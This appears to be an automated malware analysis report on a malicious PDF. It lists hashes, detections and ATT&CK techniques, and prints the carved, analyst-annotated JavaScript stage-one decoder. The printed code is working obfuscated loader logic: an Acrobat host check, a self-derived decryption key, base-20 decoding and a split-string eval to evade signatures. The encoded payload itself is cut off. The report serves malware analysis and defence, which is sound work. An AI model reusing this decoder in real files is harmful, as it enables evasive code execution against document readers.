Malicious PDF — malware analysis report

Static analysis result for SHA-256 052f0dcd584c4c0e…

MALICIOUS

PDF

15.3 KB First seen: 2021-06-17
MD5: 305bb38c8f2a64c4d3f2f669b957c495 SHA-1: f3c9943044ae3f21bd7eab161f3b0bc14769058b SHA-256: 052f0dcd584c4c0e4a02527ffeabd26a293d1e2da978b19809f4797aa2ddcfde
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript (a /JavaScript action referencing a /JS stream), flagged by multiple heuristics and a critical ClamAV detection (Pdf.Exploit.Agent-35901); the ML classifier also scores it strongly malicious. The carved script is a self-keyed decoder: it probes for the Acrobat `app` object (aborting outside an Acrobat-like host), derives its decryption key from the digit characters of its own source via `arguments.callee.toString()`, decodes a base-20 string, and executes the result through `this['ev'+'al']` — a split-string evasion of the literal `eval` token. The decoded second stage is not present in the truncated artifact, so whether it exploits the reader, downloads a payload, or both cannot be confirmed from static analysis alone; note that 'legacy_pdfkit_stage_000.js' is the analyzer's label for the carved file, not an indicator found in the sample. The delivery vector is most likely a spearphishing attachment.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9873

Heuristics 4

  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x22D | 12270 bytes
SHA-256: 48f5fa9cdaa7464dfd1cbc9efafd1b079fd1731f81c32a4af905a4e5aa69499c
Detection
ClamAV: No threats found — the signature hit is on the parent PDF; a clean result on the carved decoder (custom, unsigned code) does not lower the sample's verdict.
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/**
 * Stage-one decoder carved from the PDF's /JS stream. Analyst annotation only:
 * the code tokens below are byte-identical to the carved artifact.
 *
 * What the visible code does:
 *  - Host check: `app` (the Acrobat JavaScript API object) is referenced inside a
 *    try/catch. When `app` is undefined the ReferenceError is swallowed, the
 *    placeholder property name is never rewritten to "callee", and — when no key
 *    is supplied as the first argument — the later `.toString()` call throws a
 *    TypeError, so the decoder aborts before anything is executed. This doubles as
 *    sandbox/analysis evasion for non-Acrobat hosts.
 *  - Self-keying: `arguments.callee.toString()` returns the function's OWN source
 *    text; every decimal-digit character in it is folded into a four-slot key
 *    (reduced by the larger power-of-two constant, then by the one-byte constant).
 *    Any edit that adds, removes or changes a digit in this function — including
 *    in comments — changes the key, which is why this comment block deliberately
 *    contains no digit characters.
 *  - `pr[...].subject` is not defined anywhere in the visible script. If it
 *    resolves in the host, the second argument is REPLACED by that value, i.e. the
 *    ciphertext may come from document/host metadata rather than the call site —
 *    TODO confirm against the remaining document JavaScript.
 *  - Decoding: each ciphertext character is parsed as a base-twenty digit (the
 *    appended ' V V ' is ignored by parseInt), digits are consumed in pairs, the
 *    pair value is offset by a counter-scaled key slot, reduced into the byte
 *    range when not positive, and converted with String.fromCharCode.
 *  - The accumulated string is executed via `this['ev'+'al'](...)`; the split
 *    literal is a signature-evasion idiom for `eval`. The decoded next stage is
 *    not contained in this artifact.
 *  - Several locals (e.g. the one set to `this` and the zero-initialised one that
 *    is never read) are decoys and have no effect on the output.
 *
 * Do NOT execute outside an isolated analysis VM.
 *
 * First parameter: optional pre-computed key array; when falsy the key is derived
 *   from the function's own source as described above.
 * Second parameter: base-twenty-encoded ciphertext (may be replaced at runtime by
 *   `pr[...].subject`).
 */
function btC_y47_27o_p(K0__U8G_E8d1Gei, tl__1R17S){var BigLHX_xl_a = 20;var eg_____c = 0;var Q52fiUi = 512;var uK___r_LG = BigLHX_xl_a;var H_403Kwb5s = "";var S_wx2_dR_83J8j = 4;var AQ_bf7N = this;var x73564Cg = "1234ee";var rWY_a_X__A78G3d = arguments;/* host check: rewrites the placeholder to "callee" only if `app` resolves */try {var q6_2kyYqbY8UX = 0;if (app) {uK___r_LG = uK___r_LG + 2;tl__1R17S = pr[q6_2kyYqbY8UX].subject;}x73564Cg = x73564Cg.replace(/\d+/, "call");} catch(e) { }uK___r_LG = uK___r_LG - BigLHX_xl_a;var x5l7g20C = new Array();var g0_0jlgAh = 150;if (g0_0jlgAh > 0) {x5l7g20C[0] = g0_0jlgAh;x5l7g20C[1] = Q52fiUi;x5l7g20C[0] = x5l7g20C[0] - g0_0jlgAh;x5l7g20C[2] = x5l7g20C[0];x5l7g20C[1] = x5l7g20C[1] - Q52fiUi;x5l7g20C[3] = x5l7g20C[1];}if (K0__U8G_E8d1Gei) { x5l7g20C = K0__U8G_E8d1Gei;}/* self-keying: fold the digit characters of this function's own source into the key */if (!K0__U8G_E8d1Gei) {var Q_8__o_b__c = rWY_a_X__A78G3d[x73564Cg].toString();var J___d18r__t = 0;var UarkHt8 = J___d18r__t;g0_0jlgAh = g0_0jlgAh - 102;var I6C__1_6ijC = 0;while(UarkHt8 < Q_8__o_b__c.length) {I6C__1_6ijC = Q_8__o_b__c.charCodeAt(UarkHt8);if (I6C__1_6ijC >= g0_0jlgAh && I6C__1_6ijC <= 57) {if (J___d18r__t == S_wx2_dR_83J8j) {J___d18r__t = -1;}if (J___d18r__t < 0) { J___d18r__t = 0; }x5l7g20C[J___d18r__t] += I6C__1_6ijC;if (x5l7g20C[J___d18r__t] > Q52fiUi) {x5l7g20C[J___d18r__t] -= Q52fiUi;}J___d18r__t = J___d18r__t + 1;}UarkHt8 = UarkHt8 + 1;}}var RbB____7___e = 0;var o__2i_EV3_YSt = 0;var MrD0__3_1WT = -1;var QTf_74vdQVYSC = 0;var BeAY_K__aB0y = 0;/* reduce each key slot into the byte range */do {var C8EBY_37 = 256;if (x5l7g20C[QTf_74vdQVYSC] > C8EBY_37) {x5l7g20C[QTf_74vdQVYSC] -= C8EBY_37;}QTf_74vdQVYSC = QTf_74vdQVYSC + 1;} while (QTf_74vdQVYSC < S_wx2_dR_83J8j);QTf_74vdQVYSC = QTf_74vdQVYSC - S_wx2_dR_83J8j;/* base-twenty pair decoder over the ciphertext */while(QTf_74vdQVYSC < tl__1R17S.length) {var J1dceN_B_DXC_H = tl__1R17S.substr(QTf_74vdQVYSC, 1) + ' V V ';QTf_74vdQVYSC = QTf_74vdQVYSC + 1;var S_yD1__q = parseInt(J1dceN_B_DXC_H, BigLHX_xl_a);if (MrD0__3_1WT != -1) {o__2i_EV3_YSt += S_yD1__q;if (RbB____7___e == S_wx2_dR_83J8j) {RbB____7___e = 0;}var p_AF3_eo255 = o__2i_EV3_YSt;var lu3CWk3__y_l = 
Math.floor;p_AF3_eo255 = p_AF3_eo255 - (BeAY_K__aB0y + 2) * x5l7g20C[RbB____7___e];if (p_AF3_eo255 <= 0) {p_AF3_eo255 = p_AF3_eo255 - lu3CWk3__y_l(p_AF3_eo255 / C8EBY_37) * C8EBY_37;}p_AF3_eo255 = String.fromCharCode(p_AF3_eo255);if (uK___r_LG == 1) {H_403Kwb5s += S_yD1__q;} else if (uK___r_LG == 2) {H_403Kwb5s += p_AF3_eo255;} else {H_403Kwb5s += QTf_74vdQVYSC;MrD0__3_1WT = -2;}MrD0__3_1WT = -1;RbB____7___e = RbB____7___e + 1;BeAY_K__aB0y = BeAY_K__aB0y + 1;} else if (MrD0__3_1WT == -1) {MrD0__3_1WT = BigLHX_xl_a;o__2i_EV3_YSt = S_yD1__q * BigLHX_xl_a;}}/* execute the decoded next stage; split literal evades a plain "eval" signature */var Pjwy_Ysub = this;Pjwy_Ysub['ev'+'al'](H_403Kwb5s);}
	btC_y47_27o_p(0, "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
... (truncated)